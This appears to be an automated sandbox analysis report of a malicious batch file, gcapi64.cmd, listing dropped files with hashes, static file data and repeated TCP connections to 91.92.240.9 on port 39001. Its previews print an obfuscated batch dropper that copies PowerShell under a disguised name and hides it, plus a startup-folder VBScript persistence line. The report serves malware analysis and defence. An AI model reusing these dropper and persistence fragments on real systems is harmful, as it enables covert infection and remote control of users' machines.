                                                              SHA-256:2127F53B2007583A189268CC06216B9FCB10A990879D3E47C5FFED8017176687
                                                              SHA-512:57600BAB3C3AB35EBA613F8D142B7388316C72D5AF573F6E41DFC844E6588A128DEDF538790F23C0DCEAC7991D8CB2376B291177A9A619291248E73B08AD24F2
                                                              Malicious:false
                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):11608
                                                              Entropy (8bit):4.890472898059848
                                                              Encrypted:false
                                                              SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                              MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                              SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                              SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                              SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                              Malicious:false
                                                              Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.0818136700495735
                                                              Encrypted:false
                                                              SSDEEP:3:Nlllulrlgll//Z:NllUml
                                                              MD5:BCE202BE96167104C292ABBA72DDA325
                                                              SHA1:2F7A5938BD57E9769440EDF0B6700DD001DF7AC6
                                                              SHA-256:680BC38EEF1B5175C4E728CEA436662498DC7F8E5570CBA66D7F9627AC0A0AEE
                                                              SHA-512:195CAC106561793B62A216DA442AA663BDEDCDFCA2920848583880B25489E03888AF732B6F07834DB3A4E892F24020CC8E2C37D54F1B61F20BEEFCCDB38F0189
                                                              Malicious:false
                                                              Preview:@...e................................................@..........

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_13b4k0xn.rjh.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4wpensym.m1l.psm1

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cm4t3htx.d0w.ps1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cybmjufl.22h.psm1

                                                              Download File
                                                              Process:C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fapvy0v1.tig.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onth4cq5.buv.ps1

                                                              Download File
                                                              Process:C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouhvmtyj.kyc.ps1

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1vy2tnl.byn.psm1

                                                              Download File
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gcapi64.vbs

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):82
                                                              Entropy (8bit):4.814826474569086
                                                              Encrypted:false
                                                              SSDEEP:3:FER/n0eFHHot+kiEaKC5+mfBHn:FER/lFHIwknaZ5lBHn
                                                              MD5:AC848A9BC1360C8FF0FDF5ABB8598C85
                                                              SHA1:FCD1CBA630E598C7CC4BA46529ECC9E63DED575A
                                                              SHA-256:C0FE828F678CD5FFF4F96B530C50FA2CA6FF1A3675E4C2FD9655AAAB88B685D6
                                                              SHA-512:9E2F57833004E9D62EC554354CD74E7A582B8DB762922E57ABFFDE1CFC2829B61312352B6477E478743481DC846AB34C0BD81FAD630E54B0116193ECB7CF66A5
                                                              Malicious:true
                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\gcapi64.cmd"""

                                                              C:\Users\user\AppData\Roaming\gcapi64.cmd

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:Unicode text, UTF-8 text, with very long lines (56272), with CRLF, LF line terminators
                                                              Category:dropped
                                                              Size (bytes):2251942
                                                              Entropy (8bit):6.027261581260867
                                                              Encrypted:false
                                                              SSDEEP:24576:cdIHychRrfKNw8ZIjohxDWIqhmQvW19FIkUofW2sVWA9AKJW7YDWDxs0JN2pBr9w:nzfaw8ZIKwN8rHbfDu0JYP3VgSb0B
                                                              MD5:AD4DE6CF42956FE04C16A4C5377EDA7A
                                                              SHA1:B5A13111CAAD3291EFE38A0752D8B289C474554C
                                                              SHA-256:750DD9D265A0D47DD35F13D2F9EADA3E4D645333CC5DD5F7E88CFB402D2D6D53
                                                              SHA-512:7617CC68F85397D08DEA167BC3A2D749D8D8833A866CDDBDB9C78C75021C9C3900CA210D20120352D2196AEAFE465FD8D512DCBB2832A972F58247AFCC4D8BC9
                                                              Malicious:true
                                                              Preview:set "..........= xcopy /"..set "..........=echo F |"..set "..........=\System3"..set "..........=/h /i C:"..REM Zvnorsssqpp.REM Dqlvnbzlsl...set "..........=\Windows"..set "..........=d /q /y "..REM Ndwwoxhc.REM Ljnlonwyuo.REM Nomynhjlfx.REM Fnttky...set "..........=ell.exe %~0.Kwj"..REM Bsladyfkzev.REM Hkqkatipn...set "..........=2\Window"..set "..........=ell\v1.0"..set "..........=\powersh"..set "..........=sPowerSh"..%..........%%..........%%..........%%..........%%..........%%..........%%..........%%..........%%..........%%..........%%..........%..set "..........= +s +h"..set "..........= %~0.Kwj"....set "..........=attrib"..%..........%%..........%%..........%.......@echo off..set "..........=SE

                                                              C:\Users\user\AppData\Roaming\gcapi64.cmd.Kwj

                                                              Download File
                                                              Process:C:\Windows\System32\xcopy.exe
                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):452608
                                                              Entropy (8bit):5.459268466661775
                                                              Encrypted:false
                                                              SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                              MD5:04029E121A0CFA5991749937DD22A1D9
                                                              SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                              SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                              SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: BrowserUpdater.lnk, Detection: malicious, Browse
                                                              • Filename: Updater.lnk, Detection: malicious, Browse
                                                              • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                                              • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                                              • Filename: 7XU2cRFInT.exe, Detection: malicious, Browse
                                                              • Filename: megerosites.cmd, Detection: malicious, Browse
                                                              • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                              C:\Users\user\AppData\Roaming\gcapi64.cmd:Zone.Identifier

                                                              Download File
                                                              Process:C:\Users\user\Desktop\gcapi64.cmd.Kwj
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                              C:\Users\user\Desktop\gcapi64.cmd.Kwj

                                                              Download File
                                                              Process:C:\Windows\System32\xcopy.exe
                                                              File Type:PE32+ executable (console) x86-64, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):452608
                                                              Entropy (8bit):5.459268466661775
                                                              Encrypted:false
                                                              SSDEEP:6144:r2fdXxswSX0z/YWwO9sV1yZywi/PzNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:qVXqXEgW2KXzJ4pdd3klnnWosPhnzq
                                                              MD5:04029E121A0CFA5991749937DD22A1D9
                                                              SHA1:F43D9BB316E30AE1A3494AC5B0624F6BEA1BF054
                                                              SHA-256:9F914D42706FE215501044ACD85A32D58AAEF1419D404FDDFA5D3B48F66CCD9F
                                                              SHA-512:6A2FB055473033FD8FDB8868823442875B5B60C115031AAEDA688A35A092F6278E8687E2AE2B8DC097F8F3F35D23959757BF0C408274A2EF5F40DDFA4B5C851B
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Joe Sandbox View:
                                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                              • Filename: fed1bc0d4bf498ec8909dbc96118bda13606c389fa2d381a2a138ea63b69de3a_dump2.dll.dll, Detection: malicious, Browse
                                                              • Filename: file.exe, Detection: malicious, Browse
                                                              • Filename: BrowserUpdater.lnk, Detection: malicious, Browse
                                                              • Filename: Updater.lnk, Detection: malicious, Browse
                                                              • Filename: ZG7UaFRPVW.exe, Detection: malicious, Browse
                                                              • Filename: IN-34823_PO39276-pdf.vbe, Detection: malicious, Browse
                                                              • Filename: 7XU2cRFInT.exe, Detection: malicious, Browse
                                                              • Filename: megerosites.cmd, Detection: malicious, Browse
                                                              • Filename: Scan_SKMBT_EPDA _ SOA_Payment Reference TR-37827392-2024-07-24.Pdf.exe, Detection: malicious, Browse
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./..%k.ovk.ovk.ovu..vi.ovb..va.ov..lwi.ov..kwq.ovk.nv.ov..nwn.ov..jwb.ov..bwb.ov..vj.ov..mwj.ovRichk.ov........................PE..d....A.~.........."..........^......@=.........@..........................................`.......... .......................................L...........}...p..........................T......................(..................`................................text............................... ..`.rdata.............................@..@.data...,....`.......L..............@....pdata.......p.......T..............@..@.rsrc....}.......~...^..............@..@.reloc..............................@..B................................................................................................................................................................................................................................................

                                                              Static File Info

                                                              General

                                                              File type:Unicode text, UTF-8 text, with very long lines (56272), with CRLF, LF line terminators
                                                              Entropy (8bit):6.027261581260867
                                                              TrID:
                                                                File name:gcapi64.cmd
                                                                File size:2'251'942 bytes
                                                                MD5:ad4de6cf42956fe04c16a4c5377eda7a
                                                                SHA1:b5a13111caad3291efe38a0752d8b289c474554c
                                                                SHA256:750dd9d265a0d47dd35f13d2f9eada3e4d645333cc5dd5f7e88cfb402d2d6d53
                                                                SHA512:7617cc68f85397d08dea167bc3a2d749d8d8833a866cddbdb9c78c75021c9c3900ca210d20120352d2196aeafe465fd8d512dcbb2832a972f58247afcc4d8bc9
                                                                SSDEEP:24576:cdIHychRrfKNw8ZIjohxDWIqhmQvW19FIkUofW2sVWA9AKJW7YDWDxs0JN2pBr9w:nzfaw8ZIKwN8rHbfDu0JYP3VgSb0B
                                                                TLSH:A7A533006ED9DE6D87ACD32D307F8E6E03624FD4E844F5F5A692788E070E7D22966439
                                                                File Content Preview:set "....................= xcopy /"..set "....................=echo F |"..set "....................=\System3"..set "....................=/h /i C:"..REM Zvnorsssqpp.REM Dqlvnbzlsl...set "....................=\Windows"..set "....................=d /q /y "..

                                                                File Icon

                                                                Icon Hash:9686878b929a9886

                                                                Network Behavior

                                                                Network Port Distribution

                                                                TCP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Aug 22, 2024 11:45:18.543251038 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:18.548240900 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:18.548391104 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:18.815869093 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:18.820786953 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:18.821243048 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:18.827961922 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.041011095 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.177114964 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.177200079 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.191577911 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.196757078 CEST390014973491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.196835041 CEST4973439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.306899071 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.315207958 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.315370083 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.329442978 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.337567091 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:20.337639093 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:20.344902992 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.594578981 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.726648092 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.726706982 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.727871895 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.733144999 CEST390014973791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.733191967 CEST4973739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.835697889 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.840686083 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.840778112 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.856653929 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.861598969 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:22.861660957 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:22.866462946 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:25.768429041 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:25.819139004 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:25.902817011 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:25.903683901 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:25.909218073 CEST390015493391.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:25.915327072 CEST5493339001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:26.007632017 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:26.012578964 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:26.012746096 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:26.028053999 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:26.033186913 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:26.033246994 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:26.038280010 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.287339926 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.334726095 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.423572063 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.424654961 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.430970907 CEST390015493491.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.431020021 CEST5493439001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.560864925 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.565834999 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.569324017 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.712869883 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.717827082 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:29.719197989 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:29.723987103 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:35.791249990 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:35.881623983 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:35.921137094 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:35.921947956 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:35.927279949 CEST390015493591.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:35.927366972 CEST5493539001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:36.038738012 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:36.043720007 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:36.043819904 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:36.056958914 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:36.061950922 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:36.062035084 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:36.066917896 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.332648039 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.381675005 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.466093063 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.505033016 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.511008978 CEST390015493691.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.511113882 CEST5493639001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.708184004 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.713222980 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.713313103 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.786160946 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.791059971 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:45.791109085 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:45.795926094 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:52.972702980 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:52.973747969 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:52.973809958 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:52.973895073 CEST390015493791.92.240.9192.168.2.4
                                                                Aug 22, 2024 11:45:52.973933935 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:52.980078936 CEST5493739001192.168.2.491.92.240.9
                                                                Aug 22, 2024 11:45:52.985882998 CEST390015493791.92.240.9192.168.2.4
